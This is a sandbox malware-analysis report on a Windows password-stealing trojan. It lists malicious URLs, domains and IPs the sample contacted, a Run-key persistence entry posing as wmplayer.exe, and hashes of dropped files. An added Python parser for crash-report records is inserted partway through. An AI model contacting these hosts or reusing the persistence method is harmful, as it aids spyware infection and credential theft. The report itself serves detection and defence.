            http://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w=&3pSl=bXiTJHhxyN | 0% | Avira URL Cloud | safe
            http://bqtt8ppp.com:3010% | Avira URL Cloud | safe
            https://www.bayviewcribbage.com/odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr | 0% | Avira URL Cloud | safe
            http://www.primefindsstore.shop/hfkt/ | 0% | Avira URL Cloud | safe
            http://www.vertilehub.xyz/ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM= | 100% | Avira URL Cloud | malware
            https://www.united-domains.de/neue-top-level-domain/ | 0% | Avira URL Cloud | safe
            https://www.united-domains.de/unternehmen/datenschutz/ | 0% | Avira URL Cloud | safe
            http://www.top65s.com/awbu/?3pSl=bXiTJHhxyN&Z6ZTG=tfMOGb5YbIlZgDy8Ct7zXIcDvsDfT/TzyUAekPS/3XIjjxWvcqryNCXIK4stFUxfS1vuJxAN6daHj1X4B8YBs4RT9ktx4jetcwfj0b5V53bLA3sBo/Tvu++c4r3yYfk5ffJC8L0= | 0% | Avira URL Cloud | safe
            http://www.xuzfceth.com/wvfe/?3pSl=bXiTJHhxyN&Z6ZTG=9oDlrGBoczxc0gczmqK1qT+UWdDZ5zHLqosyG+84tRh7R4eQSXiPG8LnfVg9iGgF5+wWImCEQfufShLjWU3N10ZwNVybtIBwFMrSzRX1wq0uGk8UZr/5T8KnA73sbBy91RxM/wk= | 0% | Avira URL Cloud | safe
            https://www.united-domains.de/login/ | 0% | Avira URL Cloud | safe
            http://www.top65s.com/awbu/ | 0% | Avira URL Cloud | safe
            https://www.united-domains.de | 0% | Avira URL Cloud | safe
            http://www.vertilehub.xyz/ei4t/ | 100% | Avira URL Cloud | malware
            https://www.united-domains.de/ | 0% | Avira URL Cloud | safe
            http://www.videos60.com/hfmm/?Z6ZTG=NFJP1MENpWop4mQ2Zs5LCbA0YH8E+xFn0ZZfcGEEhmCw8vkYycZHoGwi7KU1tu5K8k8nV/m8HY5DGkDycaipo03uFrN3sKGd/4X9PAy/KU8mrpcfTGbb4advs0SPZoPYPk8rppw=&3pSl=bXiTJHhxyN | 0% | Avira URL Cloud | safe
            http://www.primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA= | 0% | Avira URL Cloud | safe
            http://www.bayviewcribbage.com | 0% | Avira URL Cloud | safe
            https://www.united-domains.de/unternehmen/kontakt/ | 0% | Avira URL Cloud | safe
            http://www.limpiezasbarcelo.com/utkc/ | 0% | Avira URL Cloud | safe
            http://primefindsstore.shop/hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14 | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.le-kuk.shop | 89.31.143.90 | true | true | | unknown
            www.xuzfceth.com | 152.32.156.214 | true | true | | unknown
            www.salecost.co.uk | 185.151.30.199 | true | true | | unknown
            onstatic-pt.setupdns.net | 81.88.57.70 | true | true | | unknown
            lcmoji.lc301adbt.com | 156.251.142.107 | true | false | | unknown
            www.primefindsstore.shop | 23.105.172.12 | true | true | | unknown
            www.hondamechanic.today | 64.190.62.22 | true | true | | unknown
            limpiezasbarcelo.com | 81.88.48.71 | true | true | | unknown
            www.vertilehub.xyz | 203.161.49.220 | true | true | | unknown
            ghs.googlehosted.com | 142.250.185.83 | true | false | | unknown
            www.videos60.com | unknown | unknown | true | | unknown
            www.ecurtiscustoms.com | unknown | unknown | true | | unknown
            www.bayviewcribbage.com | unknown | unknown | true | | unknown
            www.top65s.com | unknown | unknown | true | | unknown
            www.theestrellastore.com | unknown | unknown | true | | unknown
            www.limpiezasbarcelo.com | unknown | unknown | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
156.251.142.107 | lcmoji.lc301adbt.com | Seychelles | 40065 | CNSERVERSUS | false
23.105.172.12 | www.primefindsstore.shop | United States | 30633 | LEASEWEB-USA-WDCUS | true
64.190.62.22 | www.hondamechanic.today | United States | 11696 | NBS11696US | true
203.161.49.220 | www.vertilehub.xyz | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
142.250.185.83 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
81.88.48.71 | limpiezasbarcelo.com | Italy | 39729 | REGISTER-ASIT | true
89.31.143.90 | www.le-kuk.shop | Germany | 15598 | QSC-AG-IPXDE | true
152.32.156.214 | www.xuzfceth.com | Hong Kong | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | true
185.151.30.199 | www.salecost.co.uk | United Kingdom | 48254 | TWENTYIGB | true
81.88.57.70 | onstatic-pt.setupdns.net | Italy | 39729 | REGISTER-ASIT | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467140
Start date and time: 2024-07-03 18:51:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@21/32@12/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 77
• Number of non-executed functions: 250
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 4.231.128.59
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, atm-settingsfe-prod-geo2.trafficmanager.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, umwatson.events.data.microsoft.com, settings-prod-neu-3.northeurope.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
Time | Type | Description
12:52:54 | API Interceptor | 7213653x Sleep call for process: sc.exe modified
18:52:20 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PTR4CRBH C:\Program Files (x86)\Windows Media Player\wmplayer.exe
18:52:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PTR4CRBH C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):1.2110906069673681
                                            Encrypted:false
                                            SSDEEP:192:Fs4wCJjF4i0VeWpZaWBeHA9cOIDzuiFcZ24lO8GV6qH:64wCJ5OVBpZammAduzuiFcY4lO88ZH
                                            MD5:25B7E8108DF85A232EE6699B6BF82F47
                                            SHA1:8747021689F9B2A3F30FE59AD8085E5DD5302B69
                                            SHA-256:B5A09BD5697FE8982A4EDD72C966D41D6E0A90708650FB8404919855B440C92C
                                            SHA-512:C60294C6D08F7EB4A09B51238767439998982789D92150BDEF0786E583BADEE3D1A6445E6DC74A8B062A38F1FE550D6AAEF78FAD964AED21044201DAE2A7197E
                                            Malicious:false
                                            Preview (UTF-16LE text decoded; the record is cut off at the same point as the original preview):
                                            Version=1
                                            EventType=CLR20r3
                                            EventTime=133644991181566099
                                            ReportType=2
                                            Consent=1
                                            UploadTime=133644991190472391
                                            ReportStatus=524384
                                            ReportIdentifier=66d5c219-ea77-4678-8787-4be4333f52c9
                                            IntegratorReportIdentifier=bcad2040-1351-4d74-971c-deea3c623ef0
                                            Wow64Host=34404
                                            NsAppName=SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
                                            OriginalFilename=Etafudeqosubujasugaz
                                            AppSessionGuid=000005e8-0001-0015-2dc3-b04f69cdda01
                                            TargetAppId=W:000682fa3e97a71c371ac029de276c7b1f3c00000000!00008890d49ef32
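The Report.wer record above is plain UTF-16LE text with a byte-order mark and CRLF-delimited key=value lines. When WerFault.exe fires for a sample, that record is often the quickest place to read the crashing binary's internal name (OriginalFilename) next to the name it was dropped under (NsAppName); the two differing is worth flagging, and EventType=CLR20r3 tells you the crash was an unhandled managed (.NET) exception. The parser below is an added example and not part of the sandbox report or any Joe Security code; the embedded record is constructed to mirror the preview (only the fields shown there, values illustrative), and the function names parse_wer and triage are my own. The hex run after "!" in TargetAppId is surfaced raw so the analyst can compare it with the sample's own hashes; the code makes no claim about which hash it is.

```python
"""Parse a Windows Error Reporting Report.wer record and pull out the fields
that matter when triaging a crashed sample. Added example; the record below
is constructed from the preview in the report and is not a captured file."""
from __future__ import annotations

# Constructed sample record: UTF-16LE, CRLF line endings, BOM first, exactly
# as WerFault.exe writes it. Values reproduce the preview shown above.
_RECORD_TEXT = (
    "Version=1\r\n"
    "EventType=CLR20r3\r\n"
    "EventTime=133644991181566099\r\n"
    "ReportType=2\r\n"
    "Consent=1\r\n"
    "NsAppName=SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe\r\n"
    "OriginalFilename=Etafudeqosubujasugaz\r\n"
    "TargetAppId=W:000682fa3e97a71c371ac029de276c7b1f3c00000000!00008890d49ef32\r\n"
)
SAMPLE_WER: bytes = b"\xff\xfe" + _RECORD_TEXT.encode("utf-16-le")


def parse_wer(raw: bytes) -> dict[str, str]:
    """Decode a .wer record into a key -> value dict.

    Handles the UTF-16LE BOM explicitly instead of relying on the platform
    default, tolerates blank lines and lines without '=', and lets a later
    duplicate key overwrite an earlier one (last write wins, as WER does).
    """
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    text = raw.decode("utf-16-le", errors="replace")
    fields: dict[str, str] = {}
    for line in text.splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def triage(fields: dict[str, str]) -> dict[str, object]:
    """Derive the triage facts an analyst wants from a parsed record."""
    on_disk = fields.get("NsAppName", "")
    on_disk_stem = on_disk.rsplit(".", 1)[0] if "." in on_disk else on_disk
    internal = fields.get("OriginalFilename", "")
    target = fields.get("TargetAppId", "")
    # Everything after the first '!' is kept verbatim for manual comparison
    # against the sample's hashes; which hash WER embeds is not asserted here.
    file_id = target.split("!", 1)[1] if "!" in target else ""
    return {
        # CLR20r3 is the WER event type for an unhandled managed exception,
        # i.e. the faulting image is a .NET assembly.
        "managed_crash": fields.get("EventType") == "CLR20r3",
        # Internal name differing from the on-disk name is a common sign of
        # a renamed or repacked binary and is worth a second look.
        "name_mismatch": bool(internal) and internal.lower() != on_disk_stem.lower(),
        "internal_name": internal,
        "on_disk_name": on_disk,
        "target_file_id": file_id,
    }


if __name__ == "__main__":
    record = parse_wer(SAMPLE_WER)
    for key, value in triage(record).items():
        print(f"{key}: {value}")
```

Point parse_wer at the bytes of any Report.wer pulled from C:\ProgramData\Microsoft\Windows\WER\ReportQueue or the sandbox's dropped-files list; the decoder does not depend on the host's default encoding, so it behaves the same on Linux and Windows.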
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Mini DuMP crash report, 16 streams, Wed Jul 3 16:51:58 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):467797
                                            Entropy (8bit):3.166600784102374
                                            Encrypted:false
                                            SSDEEP:6144:qo89TbiAqx5AY63QwgfFQNSCfKV1+g5DokFBWMZ:qJ9iAqsYaQ1lK
                                            MD5:94F51452597557CEEF662DB2D9524015
                                            SHA1:9FF163DC095BCC931A8A6E850512C6AA5894170B
                                            SHA-256:C44BAB398E9E476123CCA17613A43BD6879E4D518DBEE1D2D3DD40E91DF37CC5
                                            SHA-512:D1FB3698E8DC084D52795772F312DCBE2458CA3D1BA0BB309FEAB5D559DDD31FF32144A533BE79BEEED975E23733284968A8932867688998FDC27A8AAC4E21C3
                                            Malicious:false
                                            Preview:MDMP..a..... ..........f............t...........H...........$....%......x....&......$L..P...........l.......8...........T...........h9..............xC..........dE..............................................................................eJ.......E......Lw......................T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8730
                                            Entropy (8bit):3.715738331864548
                                            Encrypted:false
                                            SSDEEP:192:R6l7wVeJyEOe6Y2DXnKrgmfZMu0apr089bcxyNftUm:R6lXJpOe6YKnKrgmftfcxYf7
                                            MD5:D1BA841238813AACA11ED81A841DCFD4
                                            SHA1:0280AC5CBF2891995460936EC269229D5BD464E1
                                            SHA-256:08C9A30B63A1707BDA545B5DB5450B9894093C11227977D68BFD5E4E900014DA
                                            SHA-512:0C3640FE112FDF4991801B6DA27671297263C582B62C9F0C5E7C006DE64C90F858B1E16CF87517AF70E3331FCD1153EF521F855B9EC6899B3B25E414EED02995
                                            Malicious:false
                                            Preview (UTF-16LE text decoded; the document is cut off at the same point as the original preview):
                                            <?xml version="1.0" encoding="UTF-16"?>
                                            <WERReportMetadata>
                                              <OSVersionInformation>
                                                <WindowsNTVersion>10.0</WindowsNTVersion>
                                                <Build>19045</Build>
                                                <Product>(0x30): Windows 10 Pro</Product>
                                                <Edition>Professional</Edition>
                                                <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
                                                <Revision>2006</Revision>
                                                <Flavor>Multiprocessor Free</Flavor>
                                                <Architecture>X64</Architecture>
                                                <LCID>2057</LCID>
                                              </OSVersionInformation>
                                              <ProcessInformation>
                                                <Pid>1512</Pi
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4965
                                            Entropy (8bit):4.609452631119753
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zsNmJg771I9epWpW8VYNYm8M4J5+fUkE6FoEyq8vkUkE//soe+S8JU+So:uIjfuI7FY7V5JW6mWk6//szLKd
                                            MD5:EFCC32B026CD88A0FE3468FD09811567
                                            SHA1:48C96AF090CADE9F46E2CAFF9F4F5BEDFDDFF392
                                            SHA-256:D6C462FBB603F7FD91567ABB2C3673FBE86EB59D9E12FB983ACA3BB8F931DD98
                                            SHA-512:AD6C597E7F31E8A8F2CBF2FCA8AF9922AC6FA70D933F34FB8A2448A1C821682180D73EE5206385EE928542269FCACEECA636E7AB2D7EBE0EF3FA4A3523B45CFC
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="395034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):1048576
                                            Entropy (8bit):1.0087776707762626
                                            Encrypted:false
                                            SSDEEP:768:d0aleDxcg7KGVp3zT13VuI61HOdrrA9abhr8fEwPRzitFrzAqUmNKX0JoJImdbaW:LZEItFPCklY+XqEMNTaBacgs
                                            MD5:2A1AE33A07F40B43BA4A202587851FDB
                                            SHA1:D34E7BAC1371DD7ECF928B97CD41EBB65D1019F6
                                            SHA-256:BA07C011B9242AB128E7F1CC828218FEA6591394005A3477C62B163DFE279BA5
                                            SHA-512:6D3E7F8AA0AFDDC962B6EB9037D6332A3280BE9707B86577716B5DE4ABE05B63AD31264262D8E1292C1EC3049FC7AE0DEAB0E506BF8E321247FD7DE3443F0FA4
                                            Malicious:false
                                            Preview:j................=.....B................ ..X.......S ...............!..........................................................................................................................................................................................................................................................................................................................................................................................................................................................L.......2........$.......$..........X.......W...W...1....................$..............................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):69740
                                            Entropy (8bit):0.40229891689370273
                                            Encrypted:false
                                            SSDEEP:96:frpOZhcbtKNZt/UMUatv7Zt8UMbat7UMlatkOZtFLQtyLZtgtx2tBt:4ZhPnSnYnq
                                            MD5:82B8F394027C6481D987F37E0EDC32AD
                                            SHA1:9E0D57DD09F4EF65271F04293A24BBC16E6BA75B
                                            SHA-256:572BF92B4969FACDA732DEE96ACCB8F619B2C6F3E303D909CD269D127B895867
                                            SHA-512:911891DF5CC0D9F22FF9928C7454013573E5DA3510D581AFDBFD159CE0E5318366390F1CF0884436B6971F2BE6A22E68D1CE00B10894406F6AE7D377EA73B641
                                            Malicious:false
                                            Preview:W.i.n.d.o.w.s. .M.e.d.i.a. .P.l.a.y.e.r...C.o.m.p.r.e.s.s.e.d. .D.B. .I.m.a.g.e.......e...........`...`...8...0.........3.6.........P..KE......KE...........@..KE...........i.#.w.|D...A.........................4.@.....4.@........x..KE..."..KE...........l..KE...........<[S..v@.....}.......................4.@.....4.@...........KE...R..KE..............KE...........'a.e%.vA....9Y4g.....................4.@.....4.@...........KE...z..KE..............KE...........z....m.M...R..B......................4.@.....4.@...........KE......KE..............KE...........a.X.-D.M.k..... .....................4.@.....4.@S.......@..KE......KE...........0..KE............. ....A....r.......................4.@.....4.@S.......h..KE......KE...........Z..KE............1G....H..Q.*Q.`.....................4.@.....4.@...........KE...>..KE..............KE............_l....@...tL.m......................4.@.....4.@...........KE...f..KE..............KE............$....9G.....wfI.....................4.@.....4.@...........K
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1272
                                            Entropy (8bit):4.037947479559426
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2SBZ5EkqfxI+/RWNVYAh1MsAvXC0R0NXqVSqCj7SNCjqCjhRNCj3:xtwxloG/rdAvyoCegICGgCGdKv
                                            MD5:159E63275630EC4C9747B664BD063938
                                            SHA1:BE4E32D7D022C3E3277E1ED65A21BEBCF787CE3F
                                            SHA-256:D54745665432625A904636E7675612C85026DA07E68F4E9D8DACBE98E5DEE844
                                            SHA-512:1A128D4F59424BCE6818C117F84DBFE16B7DA1543D7B2682460DA74839BFC6CFE805DA00112E17CBAAFDF4179E357B70FA0850FA722FB04F202E1D75E65EDB60
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music auto rated at 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Effective Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">5 stars</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1279
                                            Entropy (8bit):4.051212913630708
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2W75EkqfxI+/RWNVYAh1MsAvXzJfjzbT6qCj7SNCjqCjhRNCjqCr:xtwxlsG/rdAvDJ3dgICGgCGdKv
                                            MD5:907BFC98CE854AE312127C952D8BE0F2
                                            SHA1:02DEFE8C5F9CC85742E45BA55E4FCFE326FD960C
                                            SHA-256:C475DC7423C2AD60F25ADAAC754CD8B68B57FF04F26ECEF78F3E5961B986A324
                                            SHA-512:DB4045F992BAD6AD660769A22345C5E0D965AE521D6828D612B15F0163622C629992C313A41BC9E381F9B0F098117EEF840D33100AF4C6A3634EB0013A7FE1C7
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music added in the last month</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Acquisition Date">.. <argument name="condition">Is Later Than</argument>.. <argument name="value">Last month</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1267
                                            Entropy (8bit):4.025849031008368
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2bxOBZ5EkqfxI+/RWNVYAh1MsAvXMV/NXq2SqCj7SNCjqCjhRNCT:xtwxlgxDG/rdAvcVNvgICGgCGdKv
                                            MD5:6D791B697AF46D6777182AF7F18C2955
                                            SHA1:D73E8B5F4EE646C1C4AB6D23F3CB3394CB833CA8
                                            SHA-256:4825EB90140F6B2F4F7ED0DF66B24E10FF5D0DA70AF53EA495FD30B3AA791870
                                            SHA-512:268CF327A9F471D547AD1DAE47833CF6D722C08F9CBF5E7867A422282CE52DC320340DED93473A598903BFEE9BF6A1A3393779468DBEB27D3390DBD59E6D20BA
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music rated at 4 or 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="User Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">4 stars</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1284
                                            Entropy (8bit):4.05476728806244
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG24Mp75EkqfxI+/RWNVYAh1MsAvXbbgNzbT6qCj7SNCjqCjhRNCj3:xtwxlMAG/rdAvHmdgICGgCGdKv
                                            MD5:F8D3A4CACF055F5EC5C62218EA50D290
                                            SHA1:974474CE3FE345D8015863BD6EA7242BA118532B
                                            SHA-256:201F2170812CF8041964C4D3C5EF539D96ADEBA6A68B69ECAED0AFFE3AE8E25F
                                            SHA-512:AC32CBEB05FAE672047705679043AECF9B56314BAA09C2D3ABB7EAC655710D7CB2C967EA1772767E366BB502E8AD6DE375302F51CA62A76D962EE539B45BFC21
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music played in the last month</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Last play date">.. <argument name="condition">Is More Recent Than</argument>.. <argument name="value">Last month</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument n
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):797
                                            Entropy (8bit):4.313068810170943
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwe3tfUa75EkqfxI+/RWNVAiWMAAvXO7/jzbT6qCjWBX2WN8M+Vv:xtwx/5sG/4xAvAXddKv
                                            MD5:821D2BE672F05514127C117CEF460C6E
                                            SHA1:1C75F314E7658A3DCDCAD315E301F2BAE6D47B31
                                            SHA-256:3ABDB6CBD88AD1557054ECE3F10DD1A8494ED32F423B3CF8321B18DECC489474
                                            SHA-512:146D6293173B80FFE3721AE6E61293CC1D838E8A72713BE8B859CE33C69EF753408057BE9CE15A78D573E253548EE674CA3FEA77EFA3D330CE8C8A50F8A8A988
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 9.0.0.3442"/>.. <title>Pictures taken in the last month</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{CC823400-A8E4-4081-B073-D3B6D952FE69}" name="Pictures in my library">.. <fragment name="DateTimeTaken">.. <argument name="condition">Is Later Than</argument>.. <argument name="value">Last month</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>.. </body>..</smil>..
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):785
                                            Entropy (8bit):4.281070989332542
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwe3tfUZOBZ5EkqfxI+/RWNVAiWMAAvXMV/NXq2SqCjWBX2WN8M+Vv:xtwx/56DG/4xAvcVNvdKv
                                            MD5:0A8A40CA87323DC16893194B00C7FE77
                                            SHA1:B88A42A85053E0A7483E331B66BA5A40A6290E10
                                            SHA-256:9AA433BED2E090CC6904F1C24D5A7B5A1ED6D8F71A997E661B886C69383FD53E
                                            SHA-512:5932F09106D622054E6D624221D754FF471E3F37D9F585ED23DB7F7327FE1E2F624B22A8F7F2827B607FDB9A30683B8F20C48A39CD35A57AD5CB78467AF2C20E
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 9.0.0.3442"/>.. <title>Pictures rated 4 or 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{CC823400-A8E4-4081-B073-D3B6D952FE69}" name="Pictures in my library">.. <fragment name="User Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">4 stars</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>.. </body>..</smil>..
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1040
                                            Entropy (8bit):4.191452381408781
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2b8C5EkqfxI+/RWNV7n5VvoZAvX1Hfjz+1qCjH1LNCjqCjWBX2W0:xtwxlftG/T5VaAvFmkcCGdKv
                                            MD5:B9987B1F9DF6D0AFC01558B907E62A16
                                            SHA1:EF202D5D6F90B37C71CB757F3BABB0857CE54D86
                                            SHA-256:0892EFDB8459D81D4C5E1085239734D9910B9C6A1DEBD7189CF385141F0B19D1
